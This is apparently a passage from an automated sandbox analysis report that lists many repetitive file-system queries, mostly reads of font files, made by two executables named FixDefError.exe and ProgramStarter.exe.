      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
